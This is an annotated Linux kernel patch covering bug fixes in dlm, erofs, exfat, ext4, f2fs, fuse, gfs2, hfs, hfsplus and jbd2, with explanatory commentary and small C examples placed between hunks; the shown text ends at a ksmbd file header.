+ 					pr_debug("switch node %d to state %s case 1\n",
+ 						 node->nodeid, dlm_state_str(node->state));
+-					spin_unlock(&node->state_lock);
+-					goto send_fin;
++					set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
++					dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+ 				}
+ 				break;
+ 			case DLM_FIN_WAIT1:
++				dlm_send_ack(node->nodeid, node->seq_next);
+ 				node->state = DLM_CLOSING;
++				set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+ 				break;
+ 			case DLM_FIN_WAIT2:
++				dlm_send_ack(node->nodeid, node->seq_next);
+ 				midcomms_node_reset(node);
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+@@ -544,8 +546,6 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 				return;
+ 			}
+ 			spin_unlock(&node->state_lock);
+-
+-			set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+ 			break;
+ 		default:
+ 			WARN_ON_ONCE(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
+@@ -564,12 +564,6 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 		log_print_ratelimited("ignore dlm msg because seq mismatch, seq: %u, expected: %u, nodeid: %d",
+ 				      seq, node->seq_next, node->nodeid);
+ 	}
+-
+-	return;
+-
+-send_fin:
+-	set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+-	dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+ }
+ 
+ static struct midcomms_node *
+@@ -1214,8 +1208,15 @@ void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh,
+ 		dlm_free_mhandle(mh);
+ 		break;
+ 	case DLM_VERSION_3_2:
++		/* Hold the rcu read lock here because we are sending the
++		 * dlm message out; while doing so we could receive an ack
++		 * back that releases the mhandle, giving us a use after
++		 * free.
++		 */
++		rcu_read_lock();
+ 		dlm_midcomms_commit_msg_3_2(mh, name, namelen);
+ 		srcu_read_unlock(&nodes_srcu, mh->idx);
++		rcu_read_unlock();
+ 		break;
+ 	default:
+ 		srcu_read_unlock(&nodes_srcu, mh->idx);
+@@ -1362,11 +1363,11 @@ void dlm_midcomms_remove_member(int nodeid)
+ 		case DLM_CLOSE_WAIT:
+ 			/* passive shutdown DLM_LAST_ACK case 2 */
+ 			node->state = DLM_LAST_ACK;
+-			spin_unlock(&node->state_lock);
+-
+ 			pr_debug("switch node %d to state %s case 2\n",
+ 				 node->nodeid, dlm_state_str(node->state));
+-			goto send_fin;
++			set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
++			dlm_send_fin(node, dlm_pas_fin_ack_rcv);
++			break;
+ 		case DLM_LAST_ACK:
+ 			/* probably receive fin caught it, do nothing */
+ 			break;
+@@ -1382,12 +1383,6 @@ void dlm_midcomms_remove_member(int nodeid)
+ 	spin_unlock(&node->state_lock);
+ 
+ 	srcu_read_unlock(&nodes_srcu, idx);
+-	return;
+-
+-send_fin:
+-	set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+-	dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+-	srcu_read_unlock(&nodes_srcu, idx);
+ }
+ 
+ static void midcomms_node_release(struct rcu_head *rcu)
+@@ -1395,6 +1390,7 @@ static void midcomms_node_release(struct rcu_head *rcu)
+ 	struct midcomms_node *node = container_of(rcu, struct midcomms_node, rcu);
+ 
+ 	WARN_ON_ONCE(atomic_read(&node->send_queue_cnt));
++	dlm_send_queue_flush(node);
+ 	kfree(node);
+ }
+ 
+@@ -1418,6 +1414,7 @@ static void midcomms_shutdown(struct midcomms_node *node)
+ 		node->state = DLM_FIN_WAIT1;
+ 		pr_debug("switch node %d to state %s case 2\n",
+ 			 node->nodeid, dlm_state_str(node->state));
++		dlm_send_fin(node, dlm_act_fin_ack_rcv);
+ 		break;
+ 	case DLM_CLOSED:
+ 		/* we have what we want */
+@@ -1431,12 +1428,8 @@ static void midcomms_shutdown(struct midcomms_node *node)
+ 	}
+ 	spin_unlock(&node->state_lock);
+ 
+-	if (node->state == DLM_FIN_WAIT1) {
+-		dlm_send_fin(node, dlm_act_fin_ack_rcv);
+-
+-		if (DLM_DEBUG_FENCE_TERMINATION)
+-			msleep(5000);
+-	}
++	if (DLM_DEBUG_FENCE_TERMINATION)
++		msleep(5000);
+ 
+ 	/* wait for other side dlm + fin */
+ 	ret = wait_event_timeout(node->shutdown_wait,
+diff --git a/fs/erofs/fscache.c b/fs/erofs/fscache.c
+index 014e209623762..a7923d6661301 100644
+--- a/fs/erofs/fscache.c
++++ b/fs/erofs/fscache.c
+@@ -337,8 +337,8 @@ static void erofs_fscache_domain_put(struct erofs_domain *domain)
+ 			kern_unmount(erofs_pseudo_mnt);
+ 			erofs_pseudo_mnt = NULL;
+ 		}
+-		mutex_unlock(&erofs_domain_list_lock);
+ 		fscache_relinquish_volume(domain->volume, NULL, false);
++		mutex_unlock(&erofs_domain_list_lock);
+ 		kfree(domain->domain_id);
+ 		kfree(domain);
+ 		return;
+diff --git a/fs/exfat/dir.c b/fs/exfat/dir.c
+index 1dfa67f307f17..158427e8124e1 100644
+--- a/fs/exfat/dir.c
++++ b/fs/exfat/dir.c
+@@ -100,7 +100,7 @@ static int exfat_readdir(struct inode *inode, loff_t *cpos, struct exfat_dir_ent
+ 			clu.dir = ei->hint_bmap.clu;
+ 		}
+ 
+-		while (clu_offset > 0) {
++		while (clu_offset > 0 && clu.dir != EXFAT_EOF_CLUSTER) {
+ 			if (exfat_get_next_cluster(sb, &(clu.dir)))
+ 				return -EIO;
+ 
+@@ -234,10 +234,7 @@ static int exfat_iterate(struct file *file, struct dir_context *ctx)
+ 		fake_offset = 1;
+ 	}
+ 
+-	if (cpos & (DENTRY_SIZE - 1)) {
+-		err = -ENOENT;
+-		goto unlock;
+-	}
++	cpos = round_up(cpos, DENTRY_SIZE);
+ 
+ 	/* name buffer should be allocated before use */
+ 	err = exfat_alloc_namebuf(nb);
+diff --git a/fs/exfat/exfat_fs.h b/fs/exfat/exfat_fs.h
+index bc6d21d7c5adf..25a5df0fdfe01 100644
+--- a/fs/exfat/exfat_fs.h
++++ b/fs/exfat/exfat_fs.h
+@@ -50,7 +50,7 @@ enum {
+ #define ES_IDX_LAST_FILENAME(name_len)	\
+ 	(ES_IDX_FIRST_FILENAME + EXFAT_FILENAME_ENTRY_NUM(name_len) - 1)
+ 
+-#define DIR_DELETED		0xFFFF0321
++#define DIR_DELETED		0xFFFFFFF7
+ 
+ /* type values */
+ #define TYPE_UNUSED		0x0000
+diff --git a/fs/exfat/file.c b/fs/exfat/file.c
+index f5b29072775de..b33431c74c8af 100644
+--- a/fs/exfat/file.c
++++ b/fs/exfat/file.c
+@@ -209,8 +209,7 @@ void exfat_truncate(struct inode *inode)
+ 	if (err)
+ 		goto write_size;
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ write_size:
+ 	aligned_size = i_size_read(inode);
+ 	if (aligned_size & (blocksize - 1)) {
+diff --git a/fs/exfat/inode.c b/fs/exfat/inode.c
+index 5b644cb057fa8..481dd338f2b8e 100644
+--- a/fs/exfat/inode.c
++++ b/fs/exfat/inode.c
+@@ -220,8 +220,7 @@ static int exfat_map_cluster(struct inode *inode, unsigned int clu_offset,
+ 		num_clusters += num_to_be_allocated;
+ 		*clu = new_clu.dir;
+ 
+-		inode->i_blocks +=
+-			num_to_be_allocated << sbi->sect_per_clus_bits;
++		inode->i_blocks += EXFAT_CLU_TO_B(num_to_be_allocated, sbi) >> 9;
+ 
+ 		/*
+ 		 * Move *clu pointer along FAT chains (hole care) because the
+@@ -576,8 +575,7 @@ static int exfat_fill_inode(struct inode *inode, struct exfat_dir_entry *info)
+ 
+ 	exfat_save_attr(inode, info->attr);
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ 	inode->i_mtime = info->mtime;
+ 	inode->i_ctime = info->mtime;
+ 	ei->i_crtime = info->crtime;
+diff --git a/fs/exfat/namei.c b/fs/exfat/namei.c
+index 5f995eba5dbbe..7442fead02793 100644
+--- a/fs/exfat/namei.c
++++ b/fs/exfat/namei.c
+@@ -396,7 +396,7 @@ static int exfat_find_empty_entry(struct inode *inode,
+ 		ei->i_size_ondisk += sbi->cluster_size;
+ 		ei->i_size_aligned += sbi->cluster_size;
+ 		ei->flags = p_dir->flags;
+-		inode->i_blocks += 1 << sbi->sect_per_clus_bits;
++		inode->i_blocks += sbi->cluster_size >> 9;
+ 	}
+ 
+ 	return dentry;
+diff --git a/fs/exfat/super.c b/fs/exfat/super.c
+index 35f0305cd493c..8c32460e031e8 100644
+--- a/fs/exfat/super.c
++++ b/fs/exfat/super.c
+@@ -373,8 +373,7 @@ static int exfat_read_root(struct inode *inode)
+ 	inode->i_op = &exfat_dir_inode_operations;
+ 	inode->i_fop = &exfat_dir_operations;
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ 	ei->i_pos = ((loff_t)sbi->root_dir << 32) | 0xffffffff;
+ 	ei->i_size_aligned = i_size_read(inode);
+ 	ei->i_size_ondisk = i_size_read(inode);
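
All four exfat hunks above (file.c, inode.c, namei.c, super.c) correct the same unit
error: inode->i_blocks counts 512-byte sectors, so shifting by inode->i_blkbits or by
sect_per_clus_bits under-reported usage whenever the block size was larger than 512
bytes. A worked example, assuming a 4 KiB cluster and block size:

    #include <stdio.h>

    #define ROUND_UP(x, y)  ((((x) + (y) - 1) / (y)) * (y))

    int main(void)
    {
            unsigned long long i_size = 10000;              /* bytes */
            unsigned long long bytes = ROUND_UP(i_size, 4096ULL);

            printf("allocated bytes : %llu\n", bytes);       /* 12288 */
            printf("correct  (>> 9) : %llu\n", bytes >> 9);  /* 24    */
            printf("old     (>> 12) : %llu\n", bytes >> 12); /* 3     */
            return 0;
    }
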
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index a2f04a3808db5..0c6b011a91b3f 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1438,6 +1438,13 @@ static struct inode *ext4_xattr_inode_create(handle_t *handle,
+ 	uid_t owner[2] = { i_uid_read(inode), i_gid_read(inode) };
+ 	int err;
+ 
++	if (inode->i_sb->s_root == NULL) {
++		ext4_warning(inode->i_sb,
++			     "refuse to create EA inode when umounting");
++		WARN_ON(1);
++		return ERR_PTR(-EINVAL);
++	}
++
+ 	/*
+ 	 * Let the next inode be the goal, so we try and allocate the EA inode
+ 	 * in the same group, or nearby one.
+@@ -2567,9 +2574,8 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ 	is = kzalloc(sizeof(struct ext4_xattr_ibody_find), GFP_NOFS);
+ 	bs = kzalloc(sizeof(struct ext4_xattr_block_find), GFP_NOFS);
+-	buffer = kvmalloc(value_size, GFP_NOFS);
+ 	b_entry_name = kmalloc(entry->e_name_len + 1, GFP_NOFS);
+-	if (!is || !bs || !buffer || !b_entry_name) {
++	if (!is || !bs || !b_entry_name) {
+ 		error = -ENOMEM;
+ 		goto out;
+ 	}
+@@ -2581,12 +2587,18 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ 	/* Save the entry name and the entry value */
+ 	if (entry->e_value_inum) {
++		buffer = kvmalloc(value_size, GFP_NOFS);
++		if (!buffer) {
++			error = -ENOMEM;
++			goto out;
++		}
++
+ 		error = ext4_xattr_inode_get(inode, entry, buffer, value_size);
+ 		if (error)
+ 			goto out;
+ 	} else {
+ 		size_t value_offs = le16_to_cpu(entry->e_value_offs);
+-		memcpy(buffer, (void *)IFIRST(header) + value_offs, value_size);
++		buffer = (void *)IFIRST(header) + value_offs;
+ 	}
+ 
+ 	memcpy(b_entry_name, entry->e_name, entry->e_name_len);
+@@ -2601,25 +2613,26 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 	if (error)
+ 		goto out;
+ 
+-	/* Remove the chosen entry from the inode */
+-	error = ext4_xattr_ibody_set(handle, inode, &i, is);
+-	if (error)
+-		goto out;
+-
+ 	i.value = buffer;
+ 	i.value_len = value_size;
+ 	error = ext4_xattr_block_find(inode, &i, bs);
+ 	if (error)
+ 		goto out;
+ 
+-	/* Add entry which was removed from the inode into the block */
++	/* Move ea entry from the inode into the block */
+ 	error = ext4_xattr_block_set(handle, inode, &i, bs);
+ 	if (error)
+ 		goto out;
+-	error = 0;
++
++	/* Remove the chosen entry from the inode */
++	i.value = NULL;
++	i.value_len = 0;
++	error = ext4_xattr_ibody_set(handle, inode, &i, is);
++
+ out:
+ 	kfree(b_entry_name);
+-	kvfree(buffer);
++	if (entry->e_value_inum && buffer)
++		kvfree(buffer);
+ 	if (is)
+ 		brelse(is->iloc.bh);
+ 	if (bs)
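
Besides allocating the scratch buffer only when it is needed (EA-inode values; inline
values are now referenced in place, hence the conditional kvfree), the key fix in the
ext4 hunk is the ordering: the entry is added to the external xattr block first, and
removed from the inode body only after that succeeds, so a mid-way failure leaves the
attribute intact instead of lost. The safe-move shape (hypothetical helpers):

    /* move an item from A to B with no window where it exists nowhere */
    err = add_to_b(item);
    if (err)
            return err;     /* item is still present in A, nothing lost */

    remove_from_a(item);    /* only after the copy is safely in place   */
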
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 97e816590cd95..8cca566baf3ab 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -655,6 +655,9 @@ static void __f2fs_submit_merged_write(struct f2fs_sb_info *sbi,
+ 
+ 	f2fs_down_write(&io->io_rwsem);
+ 
++	if (!io->bio)
++		goto unlock_out;
++
+ 	/* change META to META_FLUSH in the checkpoint procedure */
+ 	if (type >= META_FLUSH) {
+ 		io->fio.type = META_FLUSH;
+@@ -663,6 +666,7 @@ static void __f2fs_submit_merged_write(struct f2fs_sb_info *sbi,
+ 			io->bio->bi_opf |= REQ_PREFLUSH | REQ_FUA;
+ 	}
+ 	__submit_merged_bio(io);
++unlock_out:
+ 	f2fs_up_write(&io->io_rwsem);
+ }
+ 
+@@ -741,7 +745,7 @@ int f2fs_submit_page_bio(struct f2fs_io_info *fio)
+ 	}
+ 
+ 	if (fio->io_wbc && !is_read_io(fio->op))
+-		wbc_account_cgroup_owner(fio->io_wbc, page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	inc_page_count(fio->sbi, is_read_io(fio->op) ?
+ 			__read_io_type(page) : WB_DATA_TYPE(fio->page));
+@@ -948,7 +952,7 @@ alloc_new:
+ 	}
+ 
+ 	if (fio->io_wbc)
+-		wbc_account_cgroup_owner(fio->io_wbc, page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	inc_page_count(fio->sbi, WB_DATA_TYPE(page));
+ 
+@@ -1022,7 +1026,7 @@ alloc_new:
+ 	}
+ 
+ 	if (fio->io_wbc)
+-		wbc_account_cgroup_owner(fio->io_wbc, bio_page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	io->last_block_in_bio = fio->new_blkaddr;
+ 
+diff --git a/fs/f2fs/inline.c b/fs/f2fs/inline.c
+index 21a495234ffd7..7e867dff681dc 100644
+--- a/fs/f2fs/inline.c
++++ b/fs/f2fs/inline.c
+@@ -422,18 +422,17 @@ static int f2fs_move_inline_dirents(struct inode *dir, struct page *ipage,
+ 
+ 	dentry_blk = page_address(page);
+ 
++	/*
++	 * Start by zeroing the full block, to ensure that all unused space is
++	 * zeroed and no uninitialized memory is leaked to disk.
++	 */
++	memset(dentry_blk, 0, F2FS_BLKSIZE);
++
+ 	make_dentry_ptr_inline(dir, &src, inline_dentry);
+ 	make_dentry_ptr_block(dir, &dst, dentry_blk);
+ 
+ 	/* copy data from inline dentry block to new dentry block */
+ 	memcpy(dst.bitmap, src.bitmap, src.nr_bitmap);
+-	memset(dst.bitmap + src.nr_bitmap, 0, dst.nr_bitmap - src.nr_bitmap);
+-	/*
+-	 * we do not need to zero out remainder part of dentry and filename
+-	 * field, since we have used bitmap for marking the usage status of
+-	 * them, besides, we can also ignore copying/zeroing reserved space
+-	 * of dentry block, because them haven't been used so far.
+-	 */
+ 	memcpy(dst.dentry, src.dentry, SIZE_OF_DIR_ENTRY * src.max);
+ 	memcpy(dst.filename, src.filename, src.max * F2FS_SLOT_LEN);
+ 
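
Rather than zeroing only the bitmap tail and trusting the in-use bitmap to mask stale
dentry and filename bytes, the f2fs block is now zeroed in full before the live
entries are copied in, so no uninitialized kernel memory can reach the disk. The
general pattern (hypothetical buffer sizes):

    #include <string.h>

    #define BLKSIZE 4096

    /* prepare a block for writing without leaking stale memory: zero it
     * all first, then copy in only the bytes that are actually used */
    static void fill_block(char *blk, const char *src, size_t used)
    {
            memset(blk, 0, BLKSIZE);
            memcpy(blk, src, used);         /* used <= BLKSIZE */
    }
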
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index ff6cf66ed46b2..fb489f55fef3a 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -714,18 +714,19 @@ void f2fs_update_inode_page(struct inode *inode)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+ 	struct page *node_page;
++	int count = 0;
+ retry:
+ 	node_page = f2fs_get_node_page(sbi, inode->i_ino);
+ 	if (IS_ERR(node_page)) {
+ 		int err = PTR_ERR(node_page);
+ 
+-		if (err == -ENOMEM) {
+-			cond_resched();
++		/* The node block was truncated. */
++		if (err == -ENOENT)
++			return;
++
++		if (err == -ENOMEM || ++count <= DEFAULT_RETRY_IO_COUNT)
+ 			goto retry;
+-		} else if (err != -ENOENT) {
+-			f2fs_stop_checkpoint(sbi, false,
+-					STOP_CP_REASON_UPDATE_INODE);
+-		}
++		f2fs_stop_checkpoint(sbi, false, STOP_CP_REASON_UPDATE_INODE);
+ 		return;
+ 	}
+ 	f2fs_update_inode(inode, node_page);
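
The rewritten f2fs retry loop sorts errors into three classes: -ENOENT (the node
block was truncated) returns quietly, -ENOMEM still retries indefinitely without
touching the counter, and any other error gets at most DEFAULT_RETRY_IO_COUNT
retries before the checkpoint is stopped. A runnable sketch of the same shape (the
failing operation is a hypothetical stub):

    #include <errno.h>
    #include <stdbool.h>

    #define RETRY_LIMIT 8

    static int attempts;
    static int try_once(void)       /* stub: fails twice, then succeeds */
    {
            return (attempts++ < 2) ? -EAGAIN : 0;
    }

    bool do_with_retries(void)
    {
            int count = 0;
            int err;

            while ((err = try_once()) != 0) {
                    if (err == -ENOENT)
                            return true;    /* object gone: nothing to do  */
                    if (err == -ENOMEM)
                            continue;       /* transient: retry forever    */
                    if (++count > RETRY_LIMIT)
                            return false;   /* bounded for everything else */
            }
            return true;
    }
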
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index ae3c4e5474efa..b019f63fd5403 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -262,19 +262,24 @@ static void __complete_revoke_list(struct inode *inode, struct list_head *head,
+ 					bool revoke)
+ {
+ 	struct revoke_entry *cur, *tmp;
++	pgoff_t start_index = 0;
+ 	bool truncate = is_inode_flag_set(inode, FI_ATOMIC_REPLACE);
+ 
+ 	list_for_each_entry_safe(cur, tmp, head, list) {
+-		if (revoke)
++		if (revoke) {
+ 			__replace_atomic_write_block(inode, cur->index,
+ 						cur->old_addr, NULL, true);
++		} else if (truncate) {
++			f2fs_truncate_hole(inode, start_index, cur->index);
++			start_index = cur->index + 1;
++		}
+ 
+ 		list_del(&cur->list);
+ 		kmem_cache_free(revoke_entry_slab, cur);
+ 	}
+ 
+ 	if (!revoke && truncate)
+-		f2fs_do_truncate_blocks(inode, 0, false);
++		f2fs_do_truncate_blocks(inode, start_index * PAGE_SIZE, false);
+ }
+ 
+ static int __f2fs_commit_atomic_write(struct inode *inode)
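
On a failed atomic replace the old f2fs code truncated the whole file from offset 0;
the new code punches holes only between the recorded atomic-write indices, keeping
blocks the atomic write never covered, and finishes with one truncate from the last
index to the end of file. The loop shape, paraphrased from the hunk with hypothetical
helper names:

    pgoff_t start = 0;

    list_for_each_entry(cur, head, list) {          /* indices ascend        */
            punch_hole(inode, start, cur->index);   /* drop [start, index)   */
            start = cur->index + 1;                 /* keep the written page */
    }
    truncate_from(inode, start * PAGE_SIZE);        /* and drop the tail     */
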
+diff --git a/fs/fuse/ioctl.c b/fs/fuse/ioctl.c
+index fcce94ace2c23..8ba1545e01f95 100644
+--- a/fs/fuse/ioctl.c
++++ b/fs/fuse/ioctl.c
+@@ -419,6 +419,12 @@ static struct fuse_file *fuse_priv_ioctl_prepare(struct inode *inode)
+ 	struct fuse_mount *fm = get_fuse_mount(inode);
+ 	bool isdir = S_ISDIR(inode->i_mode);
+ 
++	if (!fuse_allow_current_process(fm->fc))
++		return ERR_PTR(-EACCES);
++
++	if (fuse_is_bad(inode))
++		return ERR_PTR(-EIO);
++
+ 	if (!S_ISREG(inode->i_mode) && !isdir)
+ 		return ERR_PTR(-ENOTTY);
+ 
+diff --git a/fs/gfs2/aops.c b/fs/gfs2/aops.c
+index e782b4f1d1043..2f04c0ff7470b 100644
+--- a/fs/gfs2/aops.c
++++ b/fs/gfs2/aops.c
+@@ -127,7 +127,6 @@ static int __gfs2_jdata_writepage(struct page *page, struct writeback_control *w
+ {
+ 	struct inode *inode = page->mapping->host;
+ 	struct gfs2_inode *ip = GFS2_I(inode);
+-	struct gfs2_sbd *sdp = GFS2_SB(inode);
+ 
+ 	if (PageChecked(page)) {
+ 		ClearPageChecked(page);
+@@ -135,7 +134,7 @@ static int __gfs2_jdata_writepage(struct page *page, struct writeback_control *w
+ 			create_empty_buffers(page, inode->i_sb->s_blocksize,
+ 					     BIT(BH_Dirty)|BIT(BH_Uptodate));
+ 		}
+-		gfs2_page_add_databufs(ip, page, 0, sdp->sd_vfs->s_blocksize);
++		gfs2_page_add_databufs(ip, page, 0, PAGE_SIZE);
+ 	}
+ 	return gfs2_write_jdata_page(page, wbc);
+ }
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 999cc146d7083..a07cf31f58ec3 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -138,8 +138,10 @@ int gfs2_make_fs_rw(struct gfs2_sbd *sdp)
+ 		return -EIO;
+ 
+ 	error = gfs2_find_jhead(sdp->sd_jdesc, &head, false);
+-	if (error || gfs2_withdrawn(sdp))
++	if (error) {
++		gfs2_consist(sdp);
+ 		return error;
++	}
+ 
+ 	if (!(head.lh_flags & GFS2_LOG_HEAD_UNMOUNT)) {
+ 		gfs2_consist(sdp);
+@@ -151,7 +153,9 @@ int gfs2_make_fs_rw(struct gfs2_sbd *sdp)
+ 	gfs2_log_pointers_init(sdp, head.lh_blkno);
+ 
+ 	error = gfs2_quota_init(sdp);
+-	if (!error && !gfs2_withdrawn(sdp))
++	if (!error && gfs2_withdrawn(sdp))
++		error = -EIO;
++	if (!error)
+ 		set_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags);
+ 	return error;
+ }
+diff --git a/fs/hfs/bnode.c b/fs/hfs/bnode.c
+index 2015e42e752a6..6add6ebfef896 100644
+--- a/fs/hfs/bnode.c
++++ b/fs/hfs/bnode.c
+@@ -274,6 +274,7 @@ static struct hfs_bnode *__hfs_bnode_create(struct hfs_btree *tree, u32 cnid)
+ 		tree->node_hash[hash] = node;
+ 		tree->node_hash_cnt++;
+ 	} else {
++		hfs_bnode_get(node2);
+ 		spin_unlock(&tree->hash_lock);
+ 		kfree(node);
+ 		wait_event(node2->lock_wq, !test_bit(HFS_BNODE_NEW, &node2->flags));
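The one-line hfs fix takes a reference on the node found in the hash table while hash_lock is still held, so the wait_event() that follows cannot race with the node being torn down. The general pin-before-unlock pattern, as a userspace sketch (types illustrative):

#include <pthread.h>

struct node {
	int refcnt;		/* protected by 'lock' */
	/* ... payload ... */
};

/* The lookup and the refcount bump must happen inside the same
 * critical section: once the lock drops, another thread may free
 * the node before the caller gets to sleep on it. */
static struct node *lookup_and_pin(struct node *table[], int i,
				   pthread_mutex_t *lock)
{
	struct node *n;

	pthread_mutex_lock(lock);
	n = table[i];			/* the "lookup" */
	if (n)
		n->refcnt++;		/* pin BEFORE unlocking */
	pthread_mutex_unlock(lock);
	return n;			/* safe to wait on n now */
}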
+diff --git a/fs/hfsplus/super.c b/fs/hfsplus/super.c
+index 122ed89ebf9f2..1986b4f18a901 100644
+--- a/fs/hfsplus/super.c
++++ b/fs/hfsplus/super.c
+@@ -295,11 +295,11 @@ static void hfsplus_put_super(struct super_block *sb)
+ 		hfsplus_sync_fs(sb, 1);
+ 	}
+ 
++	iput(sbi->alloc_file);
++	iput(sbi->hidden_dir);
+ 	hfs_btree_close(sbi->attr_tree);
+ 	hfs_btree_close(sbi->cat_tree);
+ 	hfs_btree_close(sbi->ext_tree);
+-	iput(sbi->alloc_file);
+-	iput(sbi->hidden_dir);
+ 	kfree(sbi->s_vhdr_buf);
+ 	kfree(sbi->s_backup_vhdr_buf);
+ 	unload_nls(sbi->nls);
+diff --git a/fs/jbd2/transaction.c b/fs/jbd2/transaction.c
+index 6a404ac1c178f..15de1385012eb 100644
+--- a/fs/jbd2/transaction.c
++++ b/fs/jbd2/transaction.c
+@@ -1010,36 +1010,28 @@ repeat:
+ 	 * ie. locked but not dirty) or tune2fs (which may actually have
+ 	 * the buffer dirtied, ugh.)  */
+ 
+-	if (buffer_dirty(bh)) {
++	if (buffer_dirty(bh) && jh->b_transaction) {
++		warn_dirty_buffer(bh);
+ 		/*
+-		 * First question: is this buffer already part of the current
+-		 * transaction or the existing committing transaction?
+-		 */
+-		if (jh->b_transaction) {
+-			J_ASSERT_JH(jh,
+-				jh->b_transaction == transaction ||
+-				jh->b_transaction ==
+-					journal->j_committing_transaction);
+-			if (jh->b_next_transaction)
+-				J_ASSERT_JH(jh, jh->b_next_transaction ==
+-							transaction);
+-			warn_dirty_buffer(bh);
+-		}
+-		/*
+-		 * In any case we need to clean the dirty flag and we must
+-		 * do it under the buffer lock to be sure we don't race
+-		 * with running write-out.
++		 * We need to clean the dirty flag and we must do it under the
++		 * buffer lock to be sure we don't race with running write-out.
+ 		 */
+ 		JBUFFER_TRACE(jh, "Journalling dirty buffer");
+ 		clear_buffer_dirty(bh);
++		/*
++		 * The buffer is going to be added to BJ_Reserved list now and
++		 * nothing guarantees jbd2_journal_dirty_metadata() will be
++		 * ever called for it. So we need to set jbddirty bit here to
++		 * make sure the buffer is dirtied and written out when the
++		 * journaling machinery is done with it.
++		 */
+ 		set_buffer_jbddirty(bh);
+ 	}
+ 
+-	unlock_buffer(bh);
+-
+ 	error = -EROFS;
+ 	if (is_handle_aborted(handle)) {
+ 		spin_unlock(&jh->b_state_lock);
++		unlock_buffer(bh);
+ 		goto out;
+ 	}
+ 	error = 0;
+@@ -1049,8 +1041,10 @@ repeat:
+ 	 * b_next_transaction points to it
+ 	 */
+ 	if (jh->b_transaction == transaction ||
+-	    jh->b_next_transaction == transaction)
++	    jh->b_next_transaction == transaction) {
++		unlock_buffer(bh);
+ 		goto done;
++	}
+ 
+ 	/*
+ 	 * this is the first time this transaction is touching this buffer,
+@@ -1074,10 +1068,24 @@ repeat:
+ 		 */
+ 		smp_wmb();
+ 		spin_lock(&journal->j_list_lock);
++		if (test_clear_buffer_dirty(bh)) {
++			/*
++			 * Execute buffer dirty clearing and jh->b_transaction
++			 * assignment under journal->j_list_lock locked to
++			 * prevent bh being removed from checkpoint list if
++			 * the buffer is in an intermediate state (not dirty
++			 * and jh->b_transaction is NULL).
++			 */
++			JBUFFER_TRACE(jh, "Journalling dirty buffer");
++			set_buffer_jbddirty(bh);
++		}
+ 		__jbd2_journal_file_buffer(jh, transaction, BJ_Reserved);
+ 		spin_unlock(&journal->j_list_lock);
++		unlock_buffer(bh);
+ 		goto done;
+ 	}
++	unlock_buffer(bh);
++
+ 	/*
+ 	 * If there is already a copy-out version of this buffer, then we don't
+ 	 * need to make another one
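The jbd2 rework keeps the buffer lock held across the abort and same-transaction checks, and re-tests the dirty bit under j_list_lock immediately before filing the buffer on BJ_Reserved, so no other CPU can observe the intermediate "clean but not yet filed" state. A simplified sketch of doing the flag flip and the list insert as one critical section (illustrative types, not jbd2 code):

#include <pthread.h>
#include <stdbool.h>

struct buf {
	bool dirty;
	bool journal_dirty;
	struct buf *next;		/* intrusive list link */
};

static pthread_mutex_t list_lock = PTHREAD_MUTEX_INITIALIZER;
static struct buf *reserved;		/* head of the reserved list */

/* Clear the generic dirty bit, remember it as journal-dirty, and file
 * the buffer on the reserved list as ONE critical section.  If the
 * flag flip and the list insert were split across two lock sections,
 * a scanner could see "clean and unfiled" and reclaim the buffer. */
static void file_buffer(struct buf *b)
{
	pthread_mutex_lock(&list_lock);
	if (b->dirty) {
		b->dirty = false;
		b->journal_dirty = true;
	}
	b->next = reserved;
	reserved = b;
	pthread_mutex_unlock(&list_lock);
}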
+diff --git a/fs/ksmbd/smb2misc.c b/fs/ksmbd/smb2misc.c
+index 6e25ace365684..fbdde426dd01d 100644
+--- a/fs/ksmbd/smb2misc.c
++++ b/fs/ksmbd/smb2misc.c
